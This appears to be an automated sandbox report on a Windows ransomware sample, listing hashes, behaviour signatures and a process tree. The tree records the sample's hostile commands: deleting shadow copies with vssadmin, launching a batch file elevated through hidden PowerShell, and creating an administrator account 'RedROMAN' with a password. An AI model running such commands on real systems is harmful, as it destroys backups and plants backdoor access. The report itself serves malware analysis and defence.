Resubmissions
19/11/2020, 14:39
201119-59epbrqadx 1019/11/2020, 14:22
201119-ff99dc42e6 1019/11/2020, 14:16
201119-298y5e8ncj 9Analysis
-
max time kernel
135s -
max time network
137s -
platform
windows7_x64 -
resource
win7v20201028 -
submitted
19/11/2020, 14:16
General
-
Target
f0fbd0654d4bf299c08f1f83e7b6c3a1f332b49c24b3cf0b9b87757b8c13f093.bin.sample.exe
-
Size
1.8MB
-
MD5
10d7151b9ee53b8da8ee6f85001ffb20
-
SHA1
76d33ef58ea7b012342d975d871db64840da9675
-
SHA256
f0fbd0654d4bf299c08f1f83e7b6c3a1f332b49c24b3cf0b9b87757b8c13f093
-
SHA512
1c6d2d7f509b462b5d48db61817ee42a7204d10141c59394eb190d0dba733b831a6344bb85197dfac358939379e640c9f38732d376e28f92e187806ca574d10f
Score
9/10
Malware Config
Signatures
-
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
Modifies extensions of user files 3 IoCs
Ransomware generally changes the extension on encrypted files.
-
Drops startup file 1 IoCs
-
Modifies service 2 TTPs 5 IoCs
-
Interacts with shadow copies 2 TTPs 2 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
-
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 2 IoCs
-
Suspicious use of AdjustPrivilegeToken 5 IoCs
-
Suspicious use of WriteProcessMemory 27 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\f0fbd0654d4bf299c08f1f83e7b6c3a1f332b49c24b3cf0b9b87757b8c13f093.bin.sample.exe"C:\Users\Admin\AppData\Local\Temp\f0fbd0654d4bf299c08f1f83e7b6c3a1f332b49c24b3cf0b9b87757b8c13f093.bin.sample.exe"1⤵
- Modifies extensions of user files
- Drops startup file
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -WindowStyle Hidden get-wmiobject win32_computersystem | "fl model"2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" Start-Process C:\ProgramData\amdkey.bat -Verb runas2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\ProgramData\amdkey.bat"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /All /Quiet4⤵
- Interacts with shadow copies
-
-
C:\Windows\system32\vssadmin.exevssadmin.exe Resize ShadowStorage /For=C: /On=C: /MaxSize=320MB4⤵
- Interacts with shadow copies
-
-
C:\Windows\system32\net.exenet user /add RedROMAN p4zzaub71h4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user /add RedROMAN p4zzaub71h5⤵
-
-
-
C:\Windows\system32\net.exenet localgroup administrators RedROMAN /add4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup administrators RedROMAN /add5⤵
-
-
-
-
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Modifies service
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
9.9MB
-
Filesize
1.8MB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
9.9MB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB